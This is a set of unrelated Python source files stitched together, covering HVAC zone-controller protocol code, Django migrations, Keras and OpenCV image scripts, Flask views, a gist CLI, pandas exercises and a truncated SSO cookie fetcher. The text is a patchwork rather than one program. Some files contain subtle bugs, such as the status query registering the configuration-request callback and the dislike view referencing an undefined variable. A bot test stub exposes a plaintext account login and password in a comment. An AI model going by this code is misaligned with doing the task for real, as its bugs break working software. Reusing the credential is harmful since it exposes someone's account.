ZONE_CONTROLLER_SYSTEM_STATUS_OFF = 0x00
ZONE_CONTROLLER_SYSTEM_STATUS_COOL = 0x01
ZONE_CONTROLLER_SYSTEM_STATUS_AUTO_COOL = 0x02
ZONE_CONTROLLER_SYSTEM_STATUS_HEAT = 0x03
ZONE_CONTROLLER_SYSTEM_STATUS_AUTO_HEAT = 0x04
ZONE_CONTROLLER_SYSTEM_STATUS_BACKUP = 0x05
class ZoneControllerMDI(object):
def __init__(self, network, address, subnet, mac_address, session_id):
self.network = network
self.address = address
self.subnet = subnet
self.mac_address = mac_address
self.session_id = session_id
def _send(self, packet):
"""
:type packet: .. py:class:: climatetalk.packet.Packet
:return:
"""
packet.destination = self.address
packet.subnet = self.subnet
packet.packet_number = 0x00
self.network.send(packet)
def _get_status_mdi(self, byte_num, num_bytes):
num_bytes += 1
packet = GetStatusRequest()
packet.destination = self.address
packet.subnet = self.subnet
packet.packet_number = 0x00
event = threading.Event()
data = bytearray()
def callback(response):
data.extend(
response.payload_data[byte_num:byte_num + num_bytes]
)
GetConfigurationRequest.message_type.disconnect(
self.address,
self.subnet
)
event.set()
GetConfigurationRequest.message_type.connect(
self.address,
self.subnet,
callback
)
self.network.send(packet)
event.wait()
return data
def _get_mdi(self, byte_num, num_bytes):
num_bytes += 1
packet = GetConfigurationRequest()
packet.destination = self.address
packet.subnet = self.subnet
packet.packet_number = 0x00
event = threading.Event()
data = bytearray()
def callback(response):
data.extend(
response.payload_data[byte_num:byte_num + num_bytes]
)
GetConfigurationRequest.message_type.disconnect(
self.address,
self.subnet
)
event.set()
GetConfigurationRequest.message_type.connect(
self.address,
self.subnet,
callback
)
self.network.send(packet)
event.wait()
return data
@property
def system_type(self):
"""
:return: one of ZONE_CONTROLLER_SYSTEM_TYPE_* constants
"""
data = self._get_mdi(0, 0)
return data[0]
@property
def heat_stages(self):
"""
:return: 0x0F = variable
"""
data = self._get_mdi(1, 0)
return data[0] << 4 & 0xF
@property
def cool_stages(self):
"""
:return: 0x0F = variable
"""
data = self._get_mdi(1, 0)
return data[0] & 0xF
@property
def balance_point_set_temp(self):
"""
:return: 0x00 = Off, 0xFF = default
"""
data = self._get_mdi(2, 0)
return data[0]
@property
def filter_time(self):
"""
:return: hours
"""
data = self._get_mdi(3, 1)
return data[0] << 8 | data[1]
@filter_time.setter
def filter_time(self, value):
packet = ChangeFilterTimeRemaining()
if value is True:
packet.set_command_data(value)
elif isinstance(value, int):
packet.set_command_data(False, value)
else:
return
self._send(packet)
@property
def uv_lamp_time(self):
"""
:return: days
0x0000 = disabled
0xFFFF = default
"""
data = self._get_mdi(5, 1)
return data[0] << 8 | data[1]
@uv_lamp_time.setter
def uv_lamp_time(self, value):
packet = ChangeUvLightMaintenanceTimer()
if value is False:
packet.set_command_data(value)
elif isinstance(value, int):
packet.set_command_data(False, value)
self._send(packet)
@property
def humidifier_pad_time(self):
"""
:return: hours
0x0000 = disabled
0xFFFF = default
"""
data = self._get_mdi(7, 1)
return data[0] << 8 | data[1]
@humidifier_pad_time.setter
def humidifier_pad_time(self, value):
packet = ChangeHumidifierPadMaintTimerall()
if value is False:
packet.set_command_data(value)
elif isinstance(value, int):
packet.set_command_data(False, value)
self._send(packet)
@property
def cool_humidification_capable(self):
"""
:return: ZONE_CONTROLLER_CAPABLE or ZONE_CONTROLLER_NOT_CAPABLE
"""
data = self._get_mdi(9, 0)
return int(_get_bit(data[0], 2))
@property
def humidification_capable(self):
"""
:return: ZONE_CONTROLLER_CAPABLE or ZONE_CONTROLLER_NOT_CAPABLE
"""
data = self._get_mdi(9, 0)
return int(_get_bit(data[0], 1))
@property
def dehumidification_capable(self):
"""
:return: ZONE_CONTROLLER_CAPABLE or ZONE_CONTROLLER_NOT_CAPABLE
"""
data = self._get_mdi(9, 0)
return int(_get_bit(data[0], 0))
@property
def critical_fault(self):
data = self._get_status_mdi(0, 0)
return data[0]
@property
def minor_fault(self):
data = self._get_status_mdi(1, 0)
return data[0]
@property
def heat_demand(self):
"""
:return:
"""
data = self._get_status_mdi(7, 0)
return data[0] * 0.5
@heat_demand.setter
def heat_demand(self, value):
timer = datetime.time(minute=1, second=0)
packet = HeatDemand()
packet.set_command_data(timer, value)
self._send(packet)
@property
def cool_demand(self):
"""
:return:
"""
data = self._get_status_mdi(9, 0)
return data[0] * 0.5
@cool_demand.setter
def cool_demand(self, value):
timer = datetime.time(minute=1, second=0)
packet = CoolDemand()
packet.set_command_data(timer, value)
self._send(packet)
@property
def fan_mode_setting(self):
"""
:return: one of ZONE_CONTROLLER_FAN_STATUS_* constants
"""
data = self._get_status_mdi(10, 0)
return data[0]
@fan_mode_setting.setter
def fan_mode_setting(self, value):
packet = FanKeySelection()
packet.set_command_data(value)
self._send(packet)
@property
def fan_demand(self):
"""
:return:
"""
data = self._get_status_mdi(11, 0)
return data[0] * 0.5
def fan_demand_manual(self, value):
timer = datetime.time(minute=1, second=0)
packet = FanDemand()
packet.set_command_data(timer, _FAN_DEMAND_MANUAL, value)
self._send(packet)
fan_demand_manual = property(fset=fan_demand_manual)
def fan_demand_cool(self, value):
timer = datetime.time(minute=1, second=0)
packet = FanDemand()
packet.set_command_data(timer, _FAN_DEMAND_COOL, value)
self._send(packet)
fan_demand_cool = property(fset=fan_demand_cool)
def fan_demand_heat(self, value):
timer = datetime.time(minute=1, second=0)
packet = FanDemand()
packet.set_command_data(timer, _FAN_DEMAND_HEAT, value)
self._send(packet)
fan_demand_heat = property(fset=fan_demand_heat)
def fan_demand_aux_heat(self, value):
timer = datetime.time(minute=1, second=0)
packet = FanDemand()
packet.set_command_data(timer, _FAN_DEMAND_AUX_HEAT, value)
self._send(packet)
fan_demand_aux_heat = property(fset=fan_demand_aux_heat)
def fan_demand_emergency_heat(self, value):
timer = datetime.time(minute=1, second=0)
packet = FanDemand()
packet.set_command_data(timer, _FAN_DEMAND_EMERGENCY_HEAT, value)
self._send(packet)
fan_demand_emergency_heat = property(fset=fan_demand_emergency_heat)
def fan_demand_defrost(self, value):
timer = datetime.time(minute=1, second=0)
packet = FanDemand()
packet.set_command_data(timer, _FAN_DEMAND_DEFROST, value)
self._send(packet)
fan_demand_defrost = property(fset=fan_demand_defrost)
@property
def fan_rate(self):
"""
:return:
"""
data = self._get_mdi(12, 0)
return data[0]
@property
def fan_delay(self):
"""
:return:
"""
data = self._get_mdi(13, 0)
return data[0]
@property
def emergency_heat_demand(self):
"""
:return:
"""
data = self._get_status_mdi(14, 0)
return data[0] * 0.5
@emergency_heat_demand.setter
def emergency_heat_demand(self, value):
timer = datetime.time(minute=1, second=0)
packet = BackUpHeatDemand()
packet.set_command_data(timer, value)
self._send(packet)
@property
def aux_heat_demand(self):
"""
:return:
"""
data = self._get_status_mdi(15, 0)
return data[0] * 0.5
@aux_heat_demand.setter
def aux_heat_demand(self, value):
timer = datetime.time(minute=1, second=0)
packet = AuxHeatDemand()
packet.set_command_data(timer, value)
self._send(packet)
@property
def humidification_demand(self):
"""
:return:
"""
data = self._get_status_mdi(16, 0)
return data[0] * 0.5
@humidification_demand.setter
def humidification_demand(self, value):
timer = datetime.time(minute=1, second=0)
packet = HumidificationDemand()
packet.set_command_data(timer, value)
self._send(packet)
@property
def dehumidification_demand(self):
"""
:return:
"""
data = self._get_status_mdi(17, 0)
return data[0] * 0.5
@dehumidification_demand.setter
def dehumidification_demand(self, value):
timer = datetime.time(minute=1, second=0)
packet = DehumidificationDemand()
packet.set_command_data(timer, value)
self._send(packet)
@property
def operating_status(self):
"""
:return: one of ZONE_CONTROLLER_SYSTEM_STATUS_
"""
data = self._get_status_mdi(18, 0)
return data[0]
@operating_status.setter
def operating_status(self, value):
packet = SystemSwitchModify()
packet.set_command_data(value)
self._send(packet)
@property
def has_freeze_fault(self):
data = self._get_mdi(19, 0)
return int(_get_bit(data[0], 7))
@property
def has_overheat_fault(self):
data = self._get_mdi(19, 0)
return int(_get_bit(data[0], 6))
|
# Generated by Django 2.0.3 on 2018-08-07 10:47
import json
from django.contrib.postgres import fields
from django.db import migrations
from saleor.page.models import Page
from saleor.product.models import Category, Collection
def get_linked_object_kwargs(object):
return {"pk": object.pk, "slug": object.slug}
def get_linked_object_url(menu_item):
if menu_item.category:
return Category(
**get_linked_object_kwargs(menu_item.category)
).get_absolute_url()
elif menu_item.collection:
return Collection(
**get_linked_object_kwargs(menu_item.collection)
).get_absolute_url()
elif menu_item.page:
return Page(**get_linked_object_kwargs(menu_item.page)).get_absolute_url()
return None
def get_menu_item_as_dict(menu_item):
data = {}
object_url = get_linked_object_url(menu_item) or menu_item.url
data["url"] = object_url
data["name"] = menu_item.name
data["translations"] = {
translated.language_code: {"name": translated.name}
for translated in menu_item.translations.all()
}
return data
def get_menu_as_json(menu):
"""Build Tree-like JSON structure from the top menu.
From the top menu items, its children and its grandchildren.
"""
top_items = menu.items.filter(parent=None)
menu_data = []
for item in top_items:
top_item_data = get_menu_item_as_dict(item)
top_item_data["child_items"] = []
children = item.children.all()
for child in children:
child_data = get_menu_item_as_dict(child)
grand_children = child.children.all()
grand_children_data = [
get_menu_item_as_dict(grand_child) for grand_child in grand_children
]
child_data["child_items"] = grand_children_data
top_item_data["child_items"].append(child_data)
menu_data.append(top_item_data)
return json.dumps(menu_data)
def update_menus(apps, schema_editor):
Menu = apps.get_model("menu", "Menu")
menus = Menu.objects.all()
for menu in menus:
menu.json_content = get_menu_as_json(menu)
menu.save(update_fields=["json_content"])
class Migration(migrations.Migration):
dependencies = [("menu", "0006_auto_20180803_0528")]
operations = [
migrations.AlterField(
model_name="menu",
name="json_content",
field=fields.JSONField(blank=True, default=dict),
),
migrations.RunPython(update_menus, migrations.RunPython.noop),
]
|
import os
from os import listdir
from os.path import isdir, isfile, join
import cv2
from tensorflow.keras.preprocessing import image
from tensorflow.keras.applications.vgg16 import preprocess_input
import numpy as np
class bilddatensatz:
#
# Geht alle Unterverzeichniss des angegebenen
# Wurzelverzeichnisses durch und
# generiert eine Liste der Form:
#
# [ ["data/bikes/jfksdj43.jpg", "bikes",
# ["data/cars/bvcnm401.jpg", "cars"],
# ...
# ]
#
def __init__(self, root_folder, img_size, inputs_fuer_VGG16=False):
self.img_size = img_size
self.inputs_fuer_VGG16 = inputs_fuer_VGG16
self.all_training_items = []
self.class_names = \
[d for d in listdir(root_folder)
if isdir(os.path.join(root_folder,d))]
print("Unter dem Verzeichnis\n\t", root_folder,
"\nhabe ich folgende Unterordner/Klassen gefunden:")
print(self.class_names)
self.nr_classes = len(self.class_names)
# For each subfolder ...
for class_id, class_name in enumerate(self.class_names):
subfolder_name = root_folder + "/" + class_name + "/"
filenames = \
[subfolder_name + f
for f in listdir(subfolder_name)
if isfile(join(subfolder_name, f))]
print("{} Dateien im Unterverzeicnis {}".format(len(filenames),
subfolder_name) )
# For each image filename in current subfolder ...
for filename in filenames:
teacher_vec = np.zeros( self.nr_classes )
teacher_vec[class_id] = 1.0
self.all_training_items.append(
[filename,
class_id,
class_name,
teacher_vec] )
self.nr_images = len(self.all_training_items)
print("Insgesamt sind {} Bilder verfügbar".format(self.nr_images))
if False:
print("Hier die ersten 3 Einträge:")
print(self.all_training_items[:3])
def lade_bild(self, absolute_filename):
"""
Lade ein Bild aus der angegebenen Datei
und mache es (Farbkanal-spezifisch) Mittelwertfrei
"""
img = cv2.imread(absolute_filename)
img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)
img = cv2.resize(img,
self.img_size,
interpolation=cv2.INTER_AREA)
if self.inputs_fuer_VGG16:
x = img.astype(float)
x = np.expand_dims(x, axis=0)
#print("x has shape", x.shape)
#print("x has mean", np.mean(x))
# From the VGG paper:
# "The only pre-processing we do is subtracting the mean RGB value,
# computed on the training set, from each pixel."
#
# see imagenet_utils.py
#
x = preprocess_input(x)
#print("x has mean", np.mean(x))
img_preprocessed = x.reshape((224,224,3))
else:
img_preprocessed = img * (1.0 / 255.0)
return img, img_preprocessed
def hole_bild_per_index(self, idx):
"""
Gebe das Bild aus dem Datensatz
mit dem Index idx zurück.
"""
image_filename = self.all_training_items[idx][0]
class_id = self.all_training_items[idx][1]
class_name = self.all_training_items[idx][2]
teacher_vec = self.all_training_items[idx][3]
img, img_preprocessed = self.lade_bild(image_filename)
return img, img_preprocessed, \
class_id, class_name, teacher_vec
def hole_irgendein_bild(self):
"""
Gebe ein zufälliges Bild zurück
"""
rnd_idx = np.random.randint(0, self.nr_images)
return self.hole_bild_per_index( rnd_idx )
|
from tensorflow.keras.models import load_model
from tensorflow.keras.preprocessing import image
import numpy as np
import os
import snnn
model = load_model('./model.h5')
predictDir = './predict'
files = os.listdir(predictDir)
classDict = {v: k for k, v in snnn.getClassesDict().items()}
info = '\n\nGraduation Project ShuangJiang Du.\n'
info += 'Thanks MSRMZNM ANEKI ,ICG ANEKI for help.\n'
print(info)
charSeq = ''
for file in files:
img = image.load_img(os.path.join(predictDir ,file) ,target_size=snnn.stdSize ,color_mode='grayscale')
imgArr3 = image.img_to_array(img)
imgArr4 = np.expand_dims(imgArr3 ,axis=0)
imgArr4 = imgArr4.astype(float) / float(255)
re = model.predict_classes(imgArr4)
charSeq += classDict[re[0]]
print(classDict[re[0]] + ' -> ' + file)
print('\n' + charSeq + '\n')
|
from flask import render_template,request,redirect,url_for,abort,request
from ..models import User,Pitch,Comment,Upvote,Downvote
from . import main
from flask_login import login_required,current_user
from .forms import UpdateProfile,PitchForm,CommentForm
from .. import db,photos
# Views
@main.route('/')
def index():
'''
View root page function that returns the index page and its data
'''
pitch = Pitch.query.all()
education = Pitch.query.filter_by(category = 'education').all()
music = Pitch.query.filter_by(category = 'music').all()
religion = Pitch.query.filter_by(category = 'religion').all()
title = "Welcome to the page"
return render_template('index.html',title = title ,pitch = pitch, education = education, music = music, religion = religion)
@main.route('/new_pitch', methods = ['POST','GET'])
@login_required
def new_pitch():
form = PitchForm()
if form.validate_on_submit():
title=form.title.data
pitch=form.post.data
category=form.category.data
user_id=current_user
new_pitch_object=Pitch(pitch=pitch,user_id=current_user._get_current_object().id,category=category,title=title)
new_pitch_object.save_pitch()
return redirect(url_for('main.index'))
return render_template('pitch.html',form=form)
@main.route('/comment/<int:pitch_id>', methods = ['POST','GET'])
@login_required
def comment(pitch_id):
form = CommentForm()
pitch = Pitch.query.get(pitch_id)
all_comments = Comment.query.filter_by(pitch_id = pitch_id).all()
if form.validate_on_submit():
comment = form.comment.data
pitch_id = pitch_id
user_id = current_user._get_current_object().id
new_comment = Comment(comment = comment,user_id = user_id, pitch_id = pitch_id)
new_comment.save_comment()
return redirect(url_for('.comment', pitch_id = pitch_id))
return render_template('comment.html', form = form, pitch= pitch, all_comments = all_comments)
@main.route('/user/<uname>')
def profile(uname):
user = User.query.filter_by(username = uname).first()
user_id = current_user._get_current_object().id
pitch = Pitch.query.filter_by(user_id = user_id).all()
if user is None:
abort(404)
return render_template("profile/profile.html", user = user,pitch = pitch)
@main.route('/user/<uname>/update_profile',methods = ['GET','POST'])
@login_required
def update_profile(uname):
form = UpdateProfile()
user = User.query.filter_by(username = uname).first()
if user is None:
abort(404)
form = UpdateProfile()
if form.validate_on_submit():
user.bio = form.bio.data
db.session.add(user)
db.session.commit()
return redirect(url_for('.profile',uname=user.username))
return render_template('profile/update.html',form =form)
@main.route('/user/<uname>/update/profile',methods= ['POST'])
@login_required
def update_pic(uname):
user = User.query.filter_by(username = uname).first()
if 'photo' in request.files:
filename = photos.save(request.files['photo'])
path = f'photos/{filename}'
user.profile_pic_path = path
db.session.commit()
return redirect(url_for('main.profile',uname=uname))
@main.route('/upvote/<int:id>',methods = ['POST','GET'])
@login_required
def like(id):
pitches = Upvote.get_upvotes(id)
valid_string = f'{current_user.id}:{id}'
for pitch in pitches:
to_str = f'{pitch}'
print(valid_string+" "+to_str)
if valid_string == to_str:
return redirect(url_for('main.index',id=id))
else:
continue
new_upvote = Upvote(user = current_user, pitch_id=id)
new_upvote.save_upvote()
return redirect(url_for('main.index',id=id))
@main.route('/downvote/<int:id>',methods = ['POST','GET'])
@login_required
def dislike(id):
pitches = Downvote.get_downvotes(id)
valid_string = f'{current_user.id}:{id}'
for pitch in pitches:
to_str = f'{p}'
print(valid_string+" "+to_str)
if valid_string == to_str:
return redirect(url_for('main.index',id=id))
else:
continue
new_downvote = Downvote(user = current_user, pitch_id=id)
new_downvote.save_downvote()
return redirect(url_for('main.index',id=id))
|
# -*- coding: utf-8 -*-
"""
Name:
gist
Usage:
gist list
gist edit <id>
gist description <id> <desc>
gist info <id>
gist fork <id>
gist files <id>
gist delete <ids> ...
gist archive <id>
gist content <id> [<filename>] [--decrypt]
gist create <desc> [--public] [--encrypt] [FILES ...]
gist clone <id> [<name>]
gist version
Description:
This program provides a command line interface for interacting with github
gists.
Commands:
create
Create a new gist. A gist can be created in several ways. The content
of the gist can be piped to the gist,
$ echo "this is the content" | gist create "gist description"
The gist can be created from an existing set of files,
$ gist create "gist description" foo.txt bar.txt
The gist can be created on the fly,
$ gist create "gist description"
which will open the users default editor.
edit
You can edit your gists directly with the 'edit' command. This command
will clone the gist to a temporary directory and open up the default
editor (defined by the EDITOR environment variable) to edit the files
in the gist. When the editor is exited the user is prompted to commit
the changes, which are then pushed back to the remote.
fork
Creates a fork of the specified gist.
description
Updates the description of a gist.
list
Returns a list of your gists. The gists are returned as,
2b1823252e8433ef8682 - mathematical divagations
a485ee9ddf6828d697be - notes on defenestration
589071c7a02b1823252e + abecedarian pericombobulations
The first column is the gists unique identifier; The second column
indicates whether the gist is public ('+') or private ('-'); The third
column is the description in the gist, which may be empty.
clone
Clones a gist to the current directory. This command will clone any
gist based on its unique identifier (i.e. not just the users) to the
current directory.
delete
Deletes the specified gist.
files
Returns a list of the files in the specified gist.
archive
Downloads the specified gist to a temporary directory and adds it to a
tarball, which is then moved to the current directory.
content
Writes the content of each file in the specified gist to the terminal,
e.g.
$ gist content c971fca7997aed65ddc9
foo.txt:
this is foo
bar.txt:
this is bar
For each file in the gist the first line is the name of the file
followed by a colon, and then the content of that file is written to
the terminal.
If a filename is given, only the content of the specified filename
will be printed.
$ gist content de42344a4ecb6250d6cea00d9da6d83a file1
content of file 1
info
This command provides a complete dump of the information about the gist
as a JSON object. It is mostly useful for debugging.
version
Returns the current version of gist.
"""
import codecs
import fcntl
import locale
import logging
import os
import struct
import sys
import tempfile
import termios
import docopt
import gnupg
import simplejson as json
import gist
try:
import configparser
except ImportError:
import ConfigParser as configparser
logger = logging.getLogger('gist')
# We need to wrap stdout in order to properly handle piping uincode output
stream = sys.stdout.detach() if sys.version_info[0] > 2 else sys.stdout
encoding = locale.getpreferredencoding()
sys.stdout = codecs.getwriter(encoding)(stream)
class GistError(Exception):
def __init__(self, msg):
super(GistError, self).__init__(msg)
self.msg = msg
def terminal_width():
"""Returns the terminal width
Tries to determine the width of the terminal. If there is no terminal, then
None is returned instead.
"""
try:
exitcode = fcntl.ioctl(
0,
termios.TIOCGWINSZ,
struct.pack('HHHH', 0, 0, 0, 0))
h, w, hp, wp = struct.unpack('HHHH', exitcode)
return w
except Exception:
pass
def elide(txt, width=terminal_width()):
"""Elide the provided string
The string is elided to the specified width, which defaults to the width of
the terminal.
Arguments:
txt: the string to potentially elide
width: the maximum permitted length of the string
Returns:
A string that is no longer than the specified width.
"""
try:
if len(txt) > width:
return txt[:width - 3] + '...'
except Exception:
pass
return txt
def alternative_editor(default):
"""Return the path to the 'alternatives' editor
Argument:
default: the default to use if the alternatives editor cannot be found.
"""
if os.path.exists('/usr/bin/editor'):
return '/usr/bin/editor'
return default
def environment_editor(default):
"""Return the user specified environment default
Argument:
default: the default to use if the environment variable contains
nothing useful.
"""
editor = os.environ.get('EDITOR', '').strip()
if editor != '':
return editor
return default
def configuration_editor(config, default):
"""Return the editor in the config file
Argument:
default: the default to use if there is no editor in the config
"""
try:
return config.get('gist', 'editor')
except configparser.NoOptionError:
return default
def alternative_config(default):
"""Return the path to the config file in .config directory
Argument:
default: the default to use if ~/.config/gist does not exist.
"""
config_path = os.path.expanduser('~/.config/gist')
if os.path.isfile(config_path):
return config_path
else:
return default
def xdg_data_config(default):
"""Return the path to the config file in XDG user config directory
Argument:
default: the default to use if either the XDG_DATA_HOME environment is
not set, or the XDG_DATA_HOME directory does not contain a 'gist'
file.
"""
config = os.environ.get('XDG_DATA_HOME', '').strip()
if config != '':
config_path = os.path.join(config, 'gist')
if os.path.isfile(config_path):
return config_path
return default
def main(argv=sys.argv[1:], config=None):
args = docopt.docopt(
__doc__,
argv=argv,
version='gist-v{}'.format(gist.__version__),
)
# Read in the configuration file
if config is None:
config = configparser.ConfigParser()
config_path = os.path.expanduser('~/.gist')
config_path = alternative_config(config_path)
config_path = xdg_data_config(config_path)
with open(config_path) as fp:
config.readfp(fp)
# Setup logging
fmt = "%(created).3f %(levelname)s[%(name)s] %(message)s"
logging.basicConfig(format=fmt)
try:
log_level = config.get('gist', 'log-level').upper()
logging.getLogger('gist').setLevel(log_level)
except Exception:
logging.getLogger('gist').setLevel(logging.ERROR)
# Determine the editor to use
editor = None
editor = alternative_editor(editor)
editor = environment_editor(editor)
editor = configuration_editor(config, editor)
if editor is None:
raise ValueError('Unable to find an editor.')
token = config.get('gist', 'token')
gapi = gist.GistAPI(token=token, editor=editor)
if args['list']:
logger.debug(u'action: list')
gists = gapi.list()
for info in gists:
public = '+' if info.public else '-'
desc = '' if info.desc is None else info.desc
line = u'{} {} {}'.format(info.id, public, desc)
try:
print(elide(line))
except UnicodeEncodeError:
logger.error('unable to write gist {}'.format(info.id))
return
if args['info']:
gist_id = args['<id>']
logger.debug(u'action: info')
logger.debug(u'action: - {}'.format(gist_id))
info = gapi.info(gist_id)
print(json.dumps(info, indent=2))
return
if args['edit']:
gist_id = args['<id>']
logger.debug(u'action: edit')
logger.debug(u'action: - {}'.format(gist_id))
gapi.edit(gist_id)
return
if args['description']:
gist_id = args['<id>']
description = args['<desc>']
logger.debug(u'action: description')
logger.debug(u'action: - {}'.format(gist_id))
logger.debug(u'action: - {}'.format(description))
gapi.description(gist_id, description)
return
if args['fork']:
gist_id = args['<id>']
logger.debug(u'action: fork')
logger.debug(u'action: - {}'.format(gist_id))
info = gapi.fork(gist_id)
return
if args['clone']:
gist_id = args['<id>']
gist_name = args['<name>']
logger.debug(u'action: clone')
logger.debug(u'action: - {} as {}'.format(gist_id, gist_name))
gapi.clone(gist_id, gist_name)
return
if args['content']:
gist_id = args['<id>']
logger.debug(u'action: content')
logger.debug(u'action: - {}'.format(gist_id))
content = gapi.content(gist_id)
gist_file = content.get(args['<filename>'])
if args['--decrypt']:
if not config.has_option('gist', 'gnupg-homedir'):
raise GistError('gnupg-homedir missing from config file')
homedir = config.get('gist', 'gnupg-homedir')
logger.debug(u'action: - {}'.format(homedir))
gpg = gnupg.GPG(gnupghome=homedir, use_agent=True)
if gist_file is not None:
print(gpg.decrypt(gist_file).data.decode('utf-8'))
else:
for name, lines in content.items():
lines = gpg.decrypt(lines).data.decode('utf-8')
print(u'{} (decrypted):\n{}\n'.format(name, lines))
else:
if gist_file is not None:
print(gist_file)
else:
for name, lines in content.items():
print(u'{}:\n{}\n'.format(name, lines))
return
if args['files']:
gist_id = args['<id>']
logger.debug(u'action: files')
logger.debug(u'action: - {}'.format(gist_id))
for f in gapi.files(gist_id):
print(f)
return
if args['archive']:
gist_id = args['<id>']
logger.debug(u'action: archive')
logger.debug(u'action: - {}'.format(gist_id))
gapi.archive(gist_id)
return
if args['delete']:
gist_ids = args['<ids>']
logger.debug(u'action: delete')
for gist_id in gist_ids:
logger.debug(u'action: - {}'.format(gist_id))
gapi.delete(gist_id)
return
if args['version']:
logger.debug(u'action: version')
print('v{}'.format(gist.__version__))
return
if args['create']:
logger.debug('action: create')
# If encryption is selected, perform an initial check to make sure that
# it is possible before processing any data.
if args['--encrypt']:
if not config.has_option('gist', 'gnupg-homedir'):
raise GistError('gnupg-homedir missing from config file')
if not config.has_option('gist', 'gnupg-fingerprint'):
raise GistError('gnupg-fingerprint missing from config file')
# Retrieve the data to add to the gist
if sys.stdin.isatty():
if args['FILES']:
logger.debug('action: - reading from files')
files = {}
for path in args['FILES']:
name = os.path.basename(path)
with open(path, 'rb') as fp:
files[name] = fp.read().decode('utf-8')
else:
logger.debug('action: - reading from editor')
with tempfile.NamedTemporaryFile('wb+') as fp:
os.system('{} {}'.format(editor, fp.name))
fp.flush()
fp.seek(0)
files = {'file1.txt': fp.read().decode('utf-8')}
else:
logger.debug('action: - reading from stdin')
files = {'file1.txt': sys.stdin.read()}
description = args['<desc>']
public = args['--public']
# Encrypt the files or leave them unmodified
if args['--encrypt']:
logger.debug('action: - encrypting content')
fingerprint = config.get('gist', 'gnupg-fingerprint')
gnupghome = config.get('gist', 'gnupg-homedir')
gpg = gnupg.GPG(gnupghome=gnupghome, use_agent=True)
data = {}
for k, v in files.items():
cypher = gpg.encrypt(v.encode('utf-8'), fingerprint)
content = cypher.data.decode('utf-8')
data['{}.asc'.format(k)] = {'content': content}
else:
data = {k: {'content': v} for k, v in files.items()}
print(gapi.create(description, data, public))
return
|
#part1
# Merge the ridership and cal tables
ridership_cal = ridership.merge(cal, on=['year','month','day'])
#part2
# Merge the ridership, cal, and stations tables
ridership_cal_stations = ridership.merge(cal, on=['year','month','day']) \
.merge(stations,on=['station_id'])
#part3
# Merge the ridership, cal, and stations tables
ridership_cal_stations = ridership.merge(cal, on=['year','month','day']) \
.merge(stations, on='station_id')
# Create a filter to filter ridership_cal_stations
filter_criteria = ((ridership_cal_stations['month'] == 7)
& (ridership_cal_stations['day_type'] == 'Weekday')
& (ridership_cal_stations['station_name'] == 'Wilson'))
# Use .loc and the filter to select for rides
print(ridership_cal_stations.loc[filter_criteria, 'rides'].sum())
|
#testing.py
#login = 'westcoastautos'
#password = '1qazxsw2'
from opensourcebotsfuckyeah import *
def input_master(inputFileName):
if '.txt' not in inputFileName:
inputFileName += '.txt'
return inputFileName
inputFileName = input("Enter the name of the .txt file containing hashtags to search for: ")
inputFileName = input_master(inputFileName)
inputTagList = hashtags_list_form(inputFileName)
inputFileBlackList = input("Enter the name of the .txt file containing hashtags to avoid: ")
inputFileBlackList = input_master(inputFileName)
inputTagBlackList = hashtags_list_form(inputFileBlackList)
|
from django.conf.urls import patterns
from rboard_bugzilla.extension import BugzillaExtension
from rboard_bugzilla.forms import BugzillaSiteForm
urlpatterns = patterns('',
(r'^$', 'reviewboard.extensions.views.configure_extension',
{'ext_class': BugzillaExtension,
'form_class': BugzillaSiteForm,
}),
)
|
# Generated by Django 2.1 on 2018-08-24 16:49
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
('api', '0003_auto_20180822_1457'),
]
operations = [
migrations.CreateModel(
name='Cellar',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created', models.DateTimeField(auto_now_add=True)),
('modified', models.DateTimeField(auto_now=True)),
('purchase_date', models.DateField()),
('price', models.DecimalField(decimal_places=2, max_digits=10)),
('owner', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='cellar', to=settings.AUTH_USER_MODEL)),
],
options={
'ordering': ('owner', 'purchase_date'),
},
),
migrations.RemoveField(
model_name='winery',
name='region',
),
migrations.AlterField(
model_name='wine',
name='winery',
field=models.CharField(max_length=100, null=True),
),
migrations.AddField(
model_name='cellar',
name='wine',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='api.Wine'),
),
]
|
# Lists More Advanced
# Loops and lists
inMyBag = ['pen' , 'book' , 'sandwich' , 'rope']
for i in range(len(inMyBag)):
print('Index no. ' + str(i) + ' holds a ' + inMyBag[i]) # Everything in my bag
# The in/not in operators
print('There is a pen in my bag: ' + str('pen' in inMyBag)) # True
print('There is a cat in my bag: ' + str('cat' in inMyBag)) # False
print()
print('#####Check Yo Bag!#####')
print()
print('Enter an item or type stop to stop ')
while True:
check = input()
if check == 'stop':
break
elif check not in inMyBag:
print(check + ', that is not in my bag!')
else:
print(check + ', that is in my bag!')
# Augmented Assignment of lists
dupesInMyBag = inMyBag * 3
print(dupesInMyBag) # Three times the stuff in my bag!
# Finding values in a list
print(dupesInMyBag.index('pen')) # Shows first occurence of pen in the list (0)
# Adding values to your list
inMyBag.append('tortelini') # Adds tortelini to the end of the list
print(inMyBag)
inMyBag.insert(2, 'coffee') # Adds coffee to index number 2
print(inMyBag)
# Removing values from the list
inMyBag.remove('pen') # Remove the pen value from the list
print(inMyBag)
# Sorting values in a list
myGrades = [8, 2, 4, 6]
myGrades.sort()
print(myGrades) # Sorted numbers ascending
inMyBag.sort()
print(inMyBag) # Sorted strings alphabetically ascending
inMyBag.sort(reverse=True)
print(inMyBag) # Sorted strings alphabetically descending
|
from abc import ABCMeta, abstractmethod
from pyppeteer import launch
import requests
from pypp_cookie import get_cookies
class CookiesGetter(metaclass=ABCMeta):
def __init__(self,uid:str,password:str,page=None) -> None:
self.page = page
self.username = uid
self.password = password
@abstractmethod
def Read(self):
pass
class Cookies(CookiesGetter):
def post_(self):
data = {
'username': self.username,
'password': self.password
}
response = requests.post('https://newsso.shu.edu.cn/login/eyJ0aW1lc3RhbXAiOjE2MTg5OTUyNzg0ODkwMzA1MjYsInJlc3BvbnNlVHlwZSI6ImNvZGUiLCJjbGllbnRJZCI6IldVSFdmcm50bldZSFpmelE1UXZYVUNWeSIsInNjb3BlIjoiMSIsInJlZGlyZWN0VXJpIjoiaHR0cHM6Ly9zZWxmcmVwb3J0LnNodS5lZHUuY24vTG9naW5TU08uYXNweD9SZXR1cm5Vcmw9JTJmRGVmYXVsdC5hc3B4Iiwic3RhdGUiOiIifQ==', data=data)
for each in response.history:
